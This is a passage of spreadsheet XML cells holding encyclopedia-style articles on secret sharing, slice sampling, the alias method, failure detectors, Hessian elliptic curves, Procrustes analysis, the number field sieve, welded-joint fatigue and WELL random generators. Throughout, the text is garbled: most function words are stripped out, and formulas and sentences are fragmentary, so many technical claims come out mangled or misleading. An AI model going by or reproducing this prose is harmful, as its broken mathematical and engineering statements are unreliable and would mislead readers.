{\displaystyle t=n=2} secret shares giving three sets shares alice bob, alice carol, carol. efficient secret sharing trivial approach quickly becomes impractical number subsets increases, example revealing secret players, would require 1.009 {\displaystyle {\binom {100}{50}}\approx 1.009\times 10^{29}} schemes created player maintain 5.04 {\displaystyle {\binom {99}{49}}\approx 5.04\times 10^{28}} distinct sets shares scheme. worst case, increase exponential. this search schemes allow secrets shared efficiently threshold players. shamir's scheme scheme, shares used recover secret. system relies idea unique polynomial degree points polynomial. takes points define straight line, three points fully define quadratic, four points define cubic curve, that takes points define polynomial degree method create polynomial degree secret first coefficient remaining coefficients picked random. next find points curve give players. when least players reveal points, sufficient information 1)th degree polynomial them, first coefficient secret. blakley's scheme nonparallel lines plane intersect exactly point. three nonparallel planes space intersect exactly point. more generally, nonparallel 1)-dimensional hyperplanes intersect specific point. secret encoded single coordinate point intersection. secret encoded using coordinates, even random, insider (someone possession 1)-dimensional hyperplanes) gains information secret since knows must plane. insider gain knowledge secret outsider can, system longer information theoretic security. coordinates used, insider knows outsider (i.e., secret must x-axis 2-dimensional system). each player given enough information define hyperplane; secret recovered calculating planes' point intersection taking specified coordinate intersection. blakley's scheme less space-efficient shamir's; shamir's shares large original secret, blakley's shares times larger, threshold number players. blakley's scheme tightened adding restrictions planes usable shares. resulting scheme equivalent shamir's polynomial system. using chinese remainder theorem chinese remainder theorem also used secret sharing, provides method uniquely determine number modulo many pairwise coprime integers {\displaystyle m_{1},m_{2},...,m_{k}} given {\displaystyle s&lt;\prod _{i=1}^{k}m_{i}} there secret sharing schemes make chinese remainder theorem, mignotte's asmuth-bloom's schemes. they threshold secret sharing schemes, shares generated reduction modulo integers {\displaystyle m_{i}} secret recovered essentially solving system congruences using chinese remainder theorem. proactive secret sharing players store shares insecure computer servers, attacker could crack steal shares. practical change secret, uncompromised (shamir-style) shares renewed. dealer generates random polynomial constant term zero calculates remaining player ordered pair, x-coordinates pairs same. each player adds y-coordinates keeps result y-coordinate secret. non-updated shares attacker accumulated become useless. attacker recover secret find enough non-updated shares reach threshold. this situation happen players deleted shares. additionally, attacker cannot recover information original secret update files contain random information. dealer change threshold number distributing updates, must always remain vigilant players keeping expired shares. verifiable secret sharing player might share gain access shares. verifiable secret sharing (vss) scheme allows players certain players lying contents shares, reasonable probability error. such schemes cannot computed conventionally; players must collectively multiply numbers without individual's knowing exactly added multiplied. rabin michael ben-or devised multiparty computing (mpc) system allows players detect dishonesty part dealer part third threshold number players, even players coordinated "adaptive" attacker change strategies realtime depending information revealed. computationally secure secret sharing disadvantage unconditionally secure secret sharing schemes storage transmission shares requires amount storage bandwidth resources equivalent size secret times number shares. size secret significant, number shares data must stored shareholders. alternate techniques proposed greatly increasing efficiency secret sharing schemes, giving requirement unconditional security. techniques, known secret sharing made short, combines rabin's information dispersal algorithm (ida) shamir's secret sharing. data first encrypted randomly generated key, using symmetric encryption algorithm. next data split pieces using rabin's ida. this configured threshold, manner similar secret sharing schemes, unlike secret sharing schemes size resulting data grows factor (number fragments threshold). example, threshold number ida-produced fragments total size fragments would (15/10) times size original input. case, scheme times efficient shamir's scheme applied directly data. final step secret sharing made short shamir secret sharing produce shares randomly generated symmetric (which typically order 16–32 bytes) give share fragment shareholder. related approach, known aont-rs, applies all-or-nothing transform data pre-processing step ida. all-or-nothing transform guarantees number shares less threshold insufficient decrypt data. multi-secret space efficient (batched) secret sharing information-theoretically secure k-of-n secret-sharing scheme generates shares, size least secret itself, leading total required storage least n-fold larger secret. multi-secret sharing designed matthew franklin moti yung, multiple points polynomial host secrets; method found useful numerous applications coding multi-party computations. space efficient secret sharing, devised abhishek parakh subhash kak, share roughly size secret divided 1.this scheme makes repeated polynomial interpolation potential applications secure information dispersal sensor networks. this method based data partitioning involving roots polynomial finite field. some vulnerabilities related space efficient secret sharing schemes pointed later. they show scheme based interpolation method cannot used implement scheme secrets distributed inherently generated polynomial degree less scheme work secrets shared same, etc. other uses applications secret sharing scheme secure secret multiple servers remain recoverable despite multiple server failures. dealer several distinct participants, distributing shares among participants. each share stored different server, dealer recover secret even several servers break long recover least shares; however, crackers break server would still know secret long fewer shares stored server. this major concepts behind vanish computer project university washington, random used encrypt data, distributed secret across several nodes network. order decrypt message, least nodes network must accessible; principle particular project number secret-sharing nodes network decrease naturally time, therefore causing secret eventually vanish. however, network vulnerable sybil attack, thus making vanish insecure.any shareholder ever enough information decrypt content point able take store copy consequently, although tools techniques vanish make data irrecoverable within system time, possible force deletion data malicious user seen this leading conundrums digital rights management. dealer could send shares, necessary recover original secret, single recipient. attacker would intercept shares recover secret, task difficult intercepting single file, especially shares sent using different media (e.g. internet, mailed cds). large secrets, efficient encrypt secret distribute using secret sharing. secret sharing important primitive several protocols secure multiparty computation. secret sharing also used user authentication system. also references external links ubuntu manpage: gfshare explanation shamir secret sharing gf(28) description shamir's blakley's schemes patent secret sharing recovering (and other?) pass phrases u.s. patent 6,662,299 bibliography secret-sharing schemes code signing systems using shared secret wayback machine (archived february 2008) beimel, amos (2011). "secret-sharing schemes: survey" (pdf).</t>
  </si>
  <si>
    <t>Slice sampling</t>
  </si>
  <si>
    <t>slice sampling type markov chain monte carlo algorithm pseudo-random number sampling, i.e. drawing random samples statistical distribution. method based observation sample random variable sample uniformly region graph density function. motivation suppose want sample random variable distribution f(x). suppose following graph f(x). height f(x) corresponds likelihood point. uniformly sample value would likelihood sampled, distribution would form f(x) value instead non-uniform function f(x). instead original black line, distribution would look like blue line. order sample manner retain distribution f(x), sampling technique must used takes account varied likelihoods range f(x). method slice sampling, simplest form, samples uniformly underneath curve f(x) without need reject points, follows: choose starting value f(x0) sample value uniformly f(x0). draw horizontal line across curve position. sample point line segments within curve. repeat step using value.the motivation sample point uniformly within arbitrary curve first draw thin uniform-height horizontal slices across whole curve. then, sample point within curve randomly selecting slice falls curve x-position previous iteration, randomly picking x-position somewhere along slice. using x-position previous iteration algorithm, long select slices probabilities proportional lengths segments within curve. difficult part algorithm finding bounds horizontal slice, involves inverting function describing distribution sampled from. this especially problematic multi-modal distributions, slice consist multiple discontinuous parts. often possible form rejection sampling overcome this, sample larger slice known include desired slice question, discard points outside desired slice. this algorithm used sample area curve, regardless whether function integrates fact, scaling function constant effect sampled x-positions. this means algorithm used sample distribution whose probability density function known constant (i.e. whose normalizing constant unknown), common computational statistics. implementation slice sampling gets name first step: defining slice sampling auxiliary variable {\displaystyle this variable sampled {\displaystyle [0,f(x)]} {\displaystyle f(x)} either probability density function (pdf) least proportional pdf. this defines slice {\displaystyle f(x)\geq words, looking region probability density least {\displaystyle then next value sampled uniformly slice. value {\displaystyle sampled, this visualized alternatively sampling y-position x-position points pdf, thus desired distribution. {\displaystyle values particular consequences interpretations outside usefulness procedure. inverse available, distribution unimodal, finding slice sampling simple. not, stepping-out procedure used find region whose endpoints fall outside slice. then, sample drawn slice using rejection sampling. various procedures described detail neal.note that, contrast many available methods generating random numbers non-uniform distributions, random variates generated directly approach exhibit serial statistical dependence. this draw next sample, define slice based value f(x) current sample. compared methods slice sampling markov chain method serves purpose gibbs sampling metropolis. unlike metropolis, need manually tune candidate function candidate standard deviation. recall metropolis sensitive step size. step size small random walk causes slow decorrelation. step size large great inefficiency high rejection rate. contrast metropolis, slice sampling automatically adjusts step size match local shape density function. implementation arguably easier efficient gibbs sampling simple metropolis updates. note that, contrast many available methods generating random numbers non-uniform distributions, random variates generated directly approach exhibit serial statistical dependence. words, points independent likelihood selection. this draw next sample, define slice based value f(x) current sample. however, generated samples markovian, therefore expected converge correct distribution long run. slice sampling requires distribution sampled evaluable. relax requirement substitute evaluable distribution proportional true unevaluable distribution. univariate case sample random variable density f(x) introduce auxiliary variable iterate follows: given sample choose uniformly random interval f(x)]; given choose uniformly random {\displaystyle f^{-1}[y,+\infty sample obtained ignoring values.our auxiliary variable represents horizontal "slice" distribution. rest iteration dedicated sampling value slice representative density region considered. practice, sampling horizontal slice multimodal distribution difficult. there tension obtaining large sampling region thereby making possible large moves distribution space, obtaining simpler sampling region increase efficiency. option simplifying process regional expansion contraction. first, width parameter used define area containing given value. each endpoint area tested lies outside given slice. not, region extended appropriate direction(s) endpoints outside slice. candidate sample selected uniformly within region. candidate sample lies inside slice, accepted sample. lies outside slice, candidate point becomes boundary region. candidate sample taken uniformly. process repeats candidate sample within slice. (see diagram visual example).→ slice-within-gibbs sampling gibbs sampler, needs draw efficiently full-conditional distributions. when sampling full-conditional density easy, single iteration slice sampling metropolis-hastings algorithm used within-gibbs sample variable question. full-conditional density log-concave, efficient alternative application adaptive rejection sampling (ars) methods. when techniques cannot applied (since full-conditional non-log-concave), adaptive rejection metropolis sampling algorithms often employed. multivariate methods treating variable independently single variable slice sampling used multivariate case sampling variable turn repeatedly, gibbs sampling. requires compute, component {\displaystyle x_{i}} function proportional {\displaystyle p(x_{i}|x_{0}...x_{n})} prevent random walk behavior, overrelaxation methods used update variable turn. overrelaxation chooses value opposite side mode current value, opposed choosing independent value distribution done gibbs. hyperrectangle slice sampling this method adapts univariate algorithm multivariate case substituting hyperrectangle one-dimensional region used original. hyperrectangle initialized random position slice. shrunk points rejected. reflective slice sampling reflective slice sampling technique suppress random walk behavior successive candidate samples distribution f(x) kept within bounds slice "reflecting" direction sampling inward toward slice boundary hit. graphical representation reflective sampling, shape indicates bounds sampling slice. dots indicate start stopping points sampling walk. when samples bounds slice, direction sampling "reflected" back slice. example consider single variable example. suppose true distribution normal distribution mean standard deviation {\displaystyle g(x)\sim n(0,3^{2})} {\displaystyle f(x)={\frac {1}{\sqrt {2\pi \cdot 3^{2}}}}\ e^{-{\frac {(x-0)^{2}}{2\cdot 3^{2}}}}} peak distribution obviously {\displaystyle x=0} point 0.1330 {\displaystyle f(x)\approx 0.1330} first draw uniform random value range f(x) order define slice(es). f(x) ranges ~0.1330, value extremes suffice. suppose take 0.1. problem becomes sample points values 0.1. next, width parameter expand region consideration. this value arbitrary. suppose next, need initial value draw uniform distribution within domain f(x) satisfies f(x) (our parameter). suppose this works f(2) ~0.1065 0.1. because current region interest bounded now, endpoint area tested lies outside given slice. right bound lies outside slice (f(3) ~0.0807 0.1), left value (f(1) ~0.1258 0.1). expand left bound adding extends past limit slice. after process, bounds region interest (−3, next, take uniform sample within (−3, suppose sample yields −2.9. though sample within region interest, within slice (f(2.9) ~0.08334 0.1), modify left bound region interest point. take uniform sample (−2.9, suppose time sample yields within slice, thus accepted sample output slice sampling. within slice, would continue shrinking/resampling process valid within bounds found.if we're interested peak distribution, keep repeating process since point corresponds higher f(x) original point. another example sample normal distribution {\displaystyle n(0,1)} first choose initial x—say after sample choose uniformly random {\displaystyle (0,e^{-x^{2}/2}/{\sqrt {2\pi }}]} bounded {\displaystyle n(0,1)} after sample choose uniformly random {\displaystyle [-\alpha ,\alpha {\displaystyle \alpha ={\sqrt {-2\ln(y{\sqrt {2\pi }})}}} this slice {\displaystyle f(x)&gt;y} implementation macsyma language also markov chain monte carlo references external links http://www.probability.ca/jeff/java/slice.html</t>
  </si>
  <si>
    <t>Alias method</t>
  </si>
  <si>
    <t>computing, alias method family efficient algorithms sampling discrete probability distribution, published 1974 walker. that returns integer values according arbitrary probability distribution algorithms typically o(n) preprocessing time, random values drawn distribution o(1) time. operation internally, algorithm consults tables, probability table alias table (for generate random outcome, fair dice rolled determine index tables. based probability stored index, biased coin flipped, outcome flip used choose result ki.more concretely, algorithm operates follows: generate uniform random variate ⌊nx⌋ (this makes uniformly distributed ..., uniformly distributed 1).) return this biased coin flip. otherwise, return ki.an alternative formulation probability table, proposed marsaglia "square histogram" method, uses condition third step (where 1)/n) instead computing table generation distribution padded additional probabilities increase convenient value, power two. generate table, first initialize npi. while this, divide table entries three categories: "overfull" group, "underfull" group, initialized, "exactly full" group, initialized.if corresponding value never consulted unimportant, value sensible. long table entries exactly full, repeat following steps: arbitrarily choose overfull entry underfull entry exists, must, well.) allocate unused space entry outcome setting remove allocated space entry changing entry exactly full. assign entry appropriate category based value ui.each iteration moves least entry "exactly full" category (and last moves two), procedure guaranteed terminate iterations. each iteration done o(1) time, table o(n) time. vose: points floating-point rounding errors cause guarantee referred step violated. category empties other, remaining entries negligible error. solution accounting floating point sometimes called walker-vose method vose alias method. alias structure unique. lookup procedure slightly faster (because need consulted), goal table generation maximize doing optimally turns hard,: greedy algorithm comes reasonably close: richest give poorest. that step choose largest smallest because requires sorting requires time. efficiency although alias method efficient generating uniform deviate fast, cases optimal terms random usage. this uses full-precision random variate time, even random bits needed. case arises probabilities particularly well balanced, many needed. generating waste time. example 1⁄2, 32-bit random variate could used make choices, alias method generate one. another case arises probabilities strongly unbalanced, many example 0.999 0.001, great majority time, random bits required determine case applies. cases, table method described marsaglia al.: efficient. make many choices probability average require much less unbiased random bit. using arithmetic coding techniques arithmetic approach limit given binary entropy function. literature donald knuth, computer programming, seminumerical algorithms, section 3.4.1. implementations http://www.keithschwarz.com/darts-dice-coins/ keith schwarz: detailed explanation, numerically stable version vose's algorithm, link java implementation https://jugit.fz-juelich.de/mlz/ransampl joachim wuttke: implementation small library. https://gist.github.com/0b5786e9bfc73e75eb8180b5400cd1f8 liam huang's implementation https://github.com/joseftw/jos.weightedresult/blob/develop/src/jos.weightedresult/aliasmethodvose.cs implementation vose's algorithm. references</t>
  </si>
  <si>
    <t>Failure detector</t>
  </si>
  <si>
    <t>distributed computing system, failure detector computer application subsystem responsible detection node failures crashes. failure detectors first introduced 1996 chandra toueg book unreliable failure detectors reliable distributed systems. book depicts failure detector tool improve consensus (the achievement reliability) atomic broadcast (the sequence messages) distributed system. word, failure detectors seek errors process, system maintain level reliability. practice, failure detectors spot crashes, system processes making mistakes prevent serious crashes errors.in 21st century, failure detectors widely used distributed computing systems detect application errors, software application stops functioning properly. distributed computing projects (see list distributed computing projects) become popular, usage failure detects also becomes important critical. origin unreliable failure detector chandra toueg, co-authors book unreliable failure detectors reliable distributed systems (1996), approached concept detecting failure nodes introducing unreliable failure detector. they describe behavior unreliable failure detector distributed computing system process system entered local failure detector component, local component examine portion processes within system. addition, process must also contain programs currently suspected failure detectors. failure detector chandra toueg claimed unreliable failure detector still reliable detecting errors made system. they generalize unreliable failure detectors forms failure detectors unreliable failure detectors failure detectors share properties. furthermore, chandra toueg point important fact failure detector prevent crashes system, even crashed program suspected previously. construction failure detector essential, difficult problem occurred development fault-tolerant component distributed computer system. result, failure detector invented need detecting errors massive information transaction distributed computing systems. properties classes failure detectors distinguished important properties: completeness accuracy. completeness means failure detectors would find programs finally crashed process, whereas accuracy means correct decisions failure detectors made process. degrees completeness degrees completeness depend number crashed process suspected failure detector certain period. strong completeness: "every faulty process eventually permanently suspected every non-faulty process." weak completeness: "every faulty process eventually permanently suspected non-faulty process." degrees accuracy degrees accuracy depend number mistakes failure detector made certain period. strong accuracy: process suspected anybody) crashes." weak accuracy: "some non-faulty process never suspected." eventual strong accuracy: non-faulty process suspected time since initial period chaos time last crash occurs." eventual weak accuracy: "after initial period confusion, non-faulty process never suspected." classification failure detectors categorized following eight types: perfect failure detector eventually perfect failure detectors (♦p) strong failure detectors eventually strong failure detectors (♦s) weak failure detectors eventually weak failure detectors (♦w) quasi-perfect failure detectors eventually quasi-perfect failure detectors (♦q)the properties failure detectors described below: nutshell, properties failure detectors depend fast failure detector detects actual failures well avoids false detection. perfect failure detector find errors without mistakes, whereas weak failure detector find errors make numerous mistakes. applications different types failure detectors obtained changing properties failure detectors. first examples show increase completeness failure detector, second example shows change type failure detector another. boosting completeness following example abstracted department computer science yale university. functions boosting completeness failure detector. from example above, crashes, weak-detector eventually suspect failure detectors system eventually suspect infinite loop created failure detectors. this example also shows weak completeness failure detector also suspect crashes eventually. inspection crashed programs depend completeness. reducing failure detector failure detector following correctness arguments satisfy algorithm changing failure detector failure detector failure detector weak completeness, failure detector strong completeness. they weak accuracy. transforms weak completeness strong completeness. preserves perpetual accuracy. preserves eventual accuracy.if arguments satisfied, reduction weak failure detector strong failure detector agree algorithm within distributed computing system. also distributed computing list distributed computing projects swim protocol crash (computing) fault tolerance consensus atomic broadcast references external links http://www.cs.yale.edu/homes/aspnes/pinewiki/failuredetectors.html http://www.cs.cornell.edu/home/sam/fdpapers.html</t>
  </si>
  <si>
    <t>Hessian form of an elliptic curve</t>
  </si>
  <si>
    <t>geometry, hessian curve plane curve similar folium descartes. named german mathematician otto hesse. this curve suggested application elliptic curve cryptography, arithmetic curve representation faster needs less memory arithmetic standard weierstrass form. definition {\displaystyle field consider elliptic curve {\displaystyle following special case weierstrass form {\displaystyle curve discriminant {\displaystyle \delta =\left(a_{3}^{3}\left(a_{1}^{3}-27a_{3}\right)\right)=a_{3}^{3}\delta then point {\displaystyle p=(0,0)} order prove {\displaystyle p=(0,0)} order note tangent {\displaystyle {\displaystyle line {\displaystyle y=0} intersects {\displaystyle multiplicity {\displaystyle conversely, given point {\displaystyle order elliptic curve {\displaystyle defined field {\displaystyle curve weierstrass form {\displaystyle p=(0,0)} tangent {\displaystyle line {\displaystyle y=0} then equation curve {\displaystyle y^{2}+a_{1}xy+a_{3}y=x^{3}} {\displaystyle a_{1},a_{3}\in obtain hessian curve, necessary following transformation: first {\displaystyle denote root polynomial then note {\displaystyle finite field order {\displaystyle q\equiv 2{\pmod {3}}} every element {\displaystyle unique cube root; general, {\displaystyle lies extension field defining following value {\textstyle d={\frac {(\mu -\delta )}{\mu another curve, obtained, birationally equivalent called cubic hessian form projective coordinates) affine plane (satisfying {\textstyle x={\frac {x}{z}}} {\textstyle y={\frac {y}{z}}} furthermore, {\displaystyle d^{3}\neq (otherwise, curve would singular). starting hessian curve, birationally equivalent weierstrass equation given transformations: where: group interesting analyze group elliptic curve, defining addition doubling formulas (because attacks based running time operations). furthermore, case, need procedure compute addition, doubling subtraction points efficient results, said above. general, group defined following way: three points line zero. property, group laws different every curve. case, correct cauchy-desboves´ formulas, obtaining point infinity neutral element (the inverse again). (x1, point curve. line {\displaystyle y=-x+(x_{1}+y_{1})} contains point point infinity therefore, third point intersection line curve. intersecting elliptic curve line, following condition obtained {\displaystyle x_{2}-(x_{1}+y_{1})\cdot x+x_{1}\cdot y_{1}=\theta since {\displaystyle x_{1}+y_{1}+d} zero (because distinct x-coordinate y-coordinate i.e., {\displaystyle -p=(y_{1},x_{1})} projective coordinates {\displaystyle -p=(y_{1}:x_{1}:z_{1})} application elliptic curve cryptography elliptic curve method factorization (ecm) necessary compute scalar multiplications [n]p integer based double-and-add method; operations need addition doubling formulas. doubling now, {\displaystyle p=(x_{1}:y_{1}:z_{1})} point elliptic curve, possible define "doubling" operation using cauchy-desboves´ formulae: addition way, different points, {\displaystyle p=(x_{1}:y_{1}:z_{1})} {\displaystyle q=(x_{2}:y_{2}:z_{2})} possible define addition formula. denote points, coordinates given algorithms examples there algorithm used different points double; given joye quisquater. then, following result gives possibility obtain doubling operation addition: proposition. (x,y,z) point hessian elliptic curve e(k). then: furthermore, (z:x:y) (y:z:x). finally, contrary parameterizations, subtraction compute negation point. hence, addition algorithm also used subtracting points (x1:y1:z1) (x2:y2:z2) hessian elliptic curve: adapting order inputs according equation (3), addition algorithm presented used indifferently for: adding (diff.) points, doubling point subtracting points multiplications auxiliary variables including result variables. before invention edwards curves, results represent fastest known method implementing elliptic curve scalar multiplication towards resistance side-channel attacks. algorithms protection side-channel attacks necessary. doublings faster. since many algorithms, best addition doubling formulas given here, example one: addition (x1:y1:z1) (x2:y2:z2) points distinct assuming algorithm given y1-y2 x2-x1 y1the cost needed multiplications additions readdition cost multiplications additions, depending first point. examplegiven following points curve (1:0:−1) (0:−1:1), have: −1−0 0then: (−1:−1:0) doubling point, doubling formula given y1)2 (2y1 2x1) 2d)the cost algorithm three multiplications three squarings additions 3×2. exampleif {\displaystyle p=(-1:-1:1)} point hessian curve parameter coordinates {\displaystyle 2p=(x:y:z)} given (−1) (−1)) ((−1) (−1)) ((−4) that {\displaystyle 2p=(-4:-2:0)} extended coordinates there another coordinates system hessian curve represented; coordinates called extended coordinates. they speed addition doubling. information operations extended coordinates see: http://hyperelliptic.org/efd/g1p/auto-hessian-extended.html#addition-add-20080225-hwcd {\displaystyle {\displaystyle represented {\displaystyle x,y,z,xx,yy,zz,xy,yz,xz} satisfying following equations: {\displaystyle x=x/z} {\displaystyle y=y/z} {\displaystyle xx=x\cdot {\displaystyle yy=y\cdot {\displaystyle zz=z\cdot {\displaystyle xy=2\cdot x\cdot {\displaystyle yz=2\cdot y\cdot {\displaystyle xz=2\cdot x\cdot also information running-time required specific case, table costs operations elliptic curves twisted hessian curves external links http://hyperelliptic.org/efd/g1p/index.html notes references otto hesse (1844), "über elimination variabeln drei algebraischen gleichungen zweiten grade zwei variabeln", journal reine angewandte mathematik, 68–96 marc joye, jean-jacques quisquater (2001). "hessian elliptic curves side-channel attacks". cryptographic hardware embedded systems ches 2001. lecture notes computer science. vol. 2162. springer-verlag berlin heidelberg 2001. 402–410. doi:10.1007/3-540-44709-1_33. isbn 978-3-540-42521-2. smart (2001). "the hessian form elliptic curve". cryptographic hardware embedded systems ches 2001. lecture notes computer science. vol. 2162. springer-verlag berlin heidelberg 2001. 118–125. doi:10.1007/3-540-44709-1_11. isbn 978-3-540-42521-2.</t>
  </si>
  <si>
    <t>Generalized Procrustes analysis</t>
  </si>
  <si>
    <t>generalized procrustes analysis (gpa) method statistical analysis used compare shapes objects, results surveys, interviews, panels. developed analysing results free-choice profiling, survey technique allows respondents (such sensory panelists) describe range products words language. make sense free-choice profiling data; ways multiple factor analysis (mfa), statis method. method first published gower 1975.generalized procrustes analysis estimates scaling factor applied respondent scale usage, generating weighting factor used compensate individual scale usage differences. unlike measures principal component analysis, uses individual level data measure variance utilized analysis. procrustes distance provides metric minimize order superimpose pair shape instances annotated landmark points. applies procrustes analysis method superimpose population shapes instead shape instances. algorithm outline following: arbitrarily choose reference shape (typically selecting among available instances) superimpose instances current reference shape compute mean shape current superimposed shapes procrustes distance mean shape reference certain threshold, reference mean shape continue step also procrustes analysis orthogonal procrustes problem references i.l. dryden k.v. mardia (1998). statistical shape analysis. john wiley sons. isbn 0-471-95816-6.</t>
  </si>
  <si>
    <t>General number field sieve</t>
  </si>
  <si>
    <t>number theory, general number field sieve (gnfs) efficient classical algorithm known factoring integers larger 10100. heuristically, complexity factoring integer (consisting ⌊log2 bits) form {\displaystyle \exp \left(\left({\sqrt[{3}]{\frac {64}{9}}}+o(1)\right)(\ln n)^{\frac {1}{3}}(\ln n)^{\frac {2}{3}}\right)=l_{n}\left[{\frac {1}{3}},{\sqrt[{3}]{\frac {64}{9}}}\right]} l-notation), natural logarithm. generalization special number field sieve: latter factor numbers certain special form, general number field sieve factor number apart prime powers (which trivial factor taking roots). principle number field sieve (both special general) understood improvement simpler rational sieve quadratic sieve. when using algorithms factor large number necessary search smooth numbers (i.e. numbers small prime factors) order n1/2. size values exponential size (see below). general number field sieve, hand, manages search smooth numbers subexponential size since numbers smaller, likely smooth numbers inspected previous algorithms. this efficiency number field sieve. order achieve speed-up, number field sieve perform computations factorizations number fields. this results many rather complicated aspects algorithm, compared simpler rational sieve. size input algorithm log2 number bits binary representation element order constant exponential running time number field sieve super-polynomial sub-exponential size input. number fields suppose k-degree polynomial (the rational numbers), complex root then, f(r) rearranged express linear combination powers less this equation used reduce away powers exponent example, f(x) imaginary unit this allows define complex product: {\displaystyle (a+bi)(c+di)=ac+(ad+bc)i+(bd)i^{2}=(ac-bd)+(ad+bc)i.} general, leads directly algebraic number field q[r], defined complex numbers given {\displaystyle a_{k-1}r^{k-1}+...+a_{1}r^{1}+a_{0}r^{0},{\text{ }}a_{0},...,a_{k-1}{\text{ }}\mathbf product values computed taking product polynomials, reducing powers exponent described above, yielding value form. ensure field actually k-dimensional collapse even smaller field, sufficient irreducible polynomial rationals. similarly, define ring integers oq[r] subset q[r] roots monic polynomials integer coefficients. cases, ring integers equivalent ring z[r]. however, many exceptions, q[√d] equal modulo method polynomials f(x) g(x) small degrees chosen, integer coefficients, irreducible rationals, which, interpreted common integer root optimal strategy choosing polynomials known; simple method pick degree polynomial, consider expansion base (allowing digits number different order n1/d, pick f(x) polynomial smallest coefficients g(x) consider number field rings z[r1] z[r2], roots polynomials since degree integer coefficients, integers, bd·f(a/b), call similarly, be·g(a/b) integer. goal find integer values simultaneously make smooth relative chosen basis primes. small, small too, size better chance smooth time. current best-known approach search lattice sieving; acceptable yields, necessary large factor base. having enough pairs, using gaussian elimination, products certain corresponding squares time. slightly stronger condition needed—that norms squares number fields, condition achieved method too. each norm hence product corresponding factors square z[r1], "square root" determined product known factors z[r1])—it typically represented irrational algebraic number. similarly, product factors square z[r2], "square root" also computed. remarked gaussian elimination give optimal time algorithm. instead, sparse matrix solving algorithms block lanczos block wiedemann used. since root homomorphisms rings z[r1] z[r2] ring z/nz (the integers modulo homomorphisms "square root" (typically represented rational number) integer representative. product factors obtained square ways—one homomorphism. thus, find numbers divisible probability least half factor finding greatest common divisor improving polynomial choice choice polynomial dramatically affect time complete remainder algorithm. method choosing polynomials based expansion base shown suboptimal many practical situations, leading development better methods. method suggested murphy brent; introduce two-part score polynomials, based presence roots modulo small primes average value polynomial takes sieving area. best reported results achieved method thorsten kleinjung, allows g(x) searches composed small prime factors congruent modulo leading coefficients divisible implementations some implementations focus certain smaller class numbers. these known special number field sieve techniques, used cunningham project. project called nfsnet 2002 least 2007. used volunteer distributed computing internet.paul leyland united kingdom richard wackerbarth texas involved.until 2007, gold-standard implementation suite software developed distributed netherlands, available relatively restrictive license. 2007, jason papadopoulos developed faster implementation final processing part msieve, public domain. both implementations feature ability distributed among several nodes cluster sufficiently fast interconnect. polynomial selection normally performed software written kleinjung, msieve, lattice sieving software written franke kleinjung; distributed ggnfs. nfs@home ggnfs factor gnfs cado-nfs msieve (which contains final-processing code, polynomial selection optimized smaller numbers implementation line sieve) kmgnfs also special number field sieve notes references matthew briggs: introduction general number field sieve, 1998</t>
  </si>
  <si>
    <t>Fatigue of welded joints</t>
  </si>
  <si>
    <t>fatigue welded joints occur poorly made highly stressed welded joints subjected cyclic loading. welding manufacturing method used join various materials order form assembly. during welding, joints formed separate pieces material introduce defects residual stresses. under cyclic loading defects grow fatigue crack, causing assembly fail even cyclic stresses smaller base material weld filler material yield stress. hence, fatigue strength welded joint correlate fatigue strength base material. incorporating design considerations development phase reduce failures fatigue welded joints. stress-life method similar high cycle fatigue analysis, stress life method utilizing stress-cycle curves (also known wöhler curves) used determine strength welded joint fatigue loading. welded sample specimens undergo repeated loading specified stress amplitude, fatigue strength, material fails. this test repeated various stress amplitudes order determine corresponding cycles, failure. with data collected, fatigue strength plotted corresponding number cycles specific material, welded joint loading. from curves, endurance limit, finite-life infinite-life region determined. factors affecting fatigue welding residual stresses during welding process, residual stresses present area weld, either heat affected zone fusion zone. mean stress welded joint application, altered welding processes implementing residual stresses, changing fatigue life render laboratory testing results. welded assemblies, geometrical imperfections, also introduce residual stresses. removal residual stresses stress relief methods partially achieved. residual stresses still remain welded joint even stress relief methods achieved. member thickness increase thickness base material decreases fatigue strength crack propagates welded joint. this increase residual stress concentrations thick material cross sections. material type materials varying physical mechanical properties. materials ultimate tensile strength increases, lead increase fatigue strength. this case evaluating materials contain welded joints. therefore, stress-cycle curves welded joints cannot correlated materials ultimate tensile strength. most design information developed structural steels. welding process many welding processes available various applications environments. stress-cycle curves available processes still need developed proper fatigue analysis performed. abundant process found stress-cycle curves developed specimens prepared welding. surrounding environment surrounding environment effect fatigue life welded assembly, often lowering points temperature, moisture, geographical location considered part surrounding environment. environments contain water decreased fatigue life increase crack growth rates. little information available area, known base material subjected corrosion, fatigue strength decrease similarly found welded joints. avoiding fatigue failures welded joint since presence cracks reduces fatigue life accelerates failure, important avoid cracking mechanisms order prolong fatigue life welded joint. other weld defects, inclusions lack penetration, also avoided defects source cracks initiate. detailed review welded joint design another reduce failures. ensuring design able handle cyclic loading profile prevent premature failures. additional resources design handbooks also available designing welded joint optimize fatigue life. finite element analysis also used successfully predict fatigue failure. references</t>
  </si>
  <si>
    <t>Well equidistributed long-period linear</t>
  </si>
  <si>
    <t>well equidistributed long-period linear (well) family pseudorandom number generators developed 2006 françois panneton, pierre l'ecuyer, makoto matsumoto form linear-feedback shift register optimized software implementation 32-bit machine. operational design structure similar mersenne twister, large state made previous output words bits each), output word generated using linear recurrences modulo finite binary field {\displaystyle f_{2}} however, complex recurrence produces denser generator polynomial, producing better statistical properties. each step generator reads five words state: oldest bits (which straddle word boundary state size multiple 32), newest bits, three words between. then series eight single-word transformations (mostly form {\textstyle x:=x\oplus (x\gg exclusive-or operations combine words, become newest words state, output. variants specific parameters provided following generators: well512a well521a, well521b well607a, well607b well800a, well800b well1024a, well1024b well19937a, well19937b, well19937c well21701a well23209a, well23209b well44497a, well44497b.numbers give state size bits; letter suffixes denote variants size. implementations implementations well512a, well1024a, well19937a, well19937c, well44497a, well44497b (free non-commercial use) implementations algorithms scala implementations implementations well512, well1024, well607 java implementations well512, well1024 basic modified "maximally equidistributed" implementations well19937, well44497 (free non-commercial use) implementation well512 (public domain) references external links academic paper, related articles françois panneton pierre l'ecuyer's publications</t>
  </si>
  <si>
    <t>Snake-in-the-box</t>
  </si>
  <si>
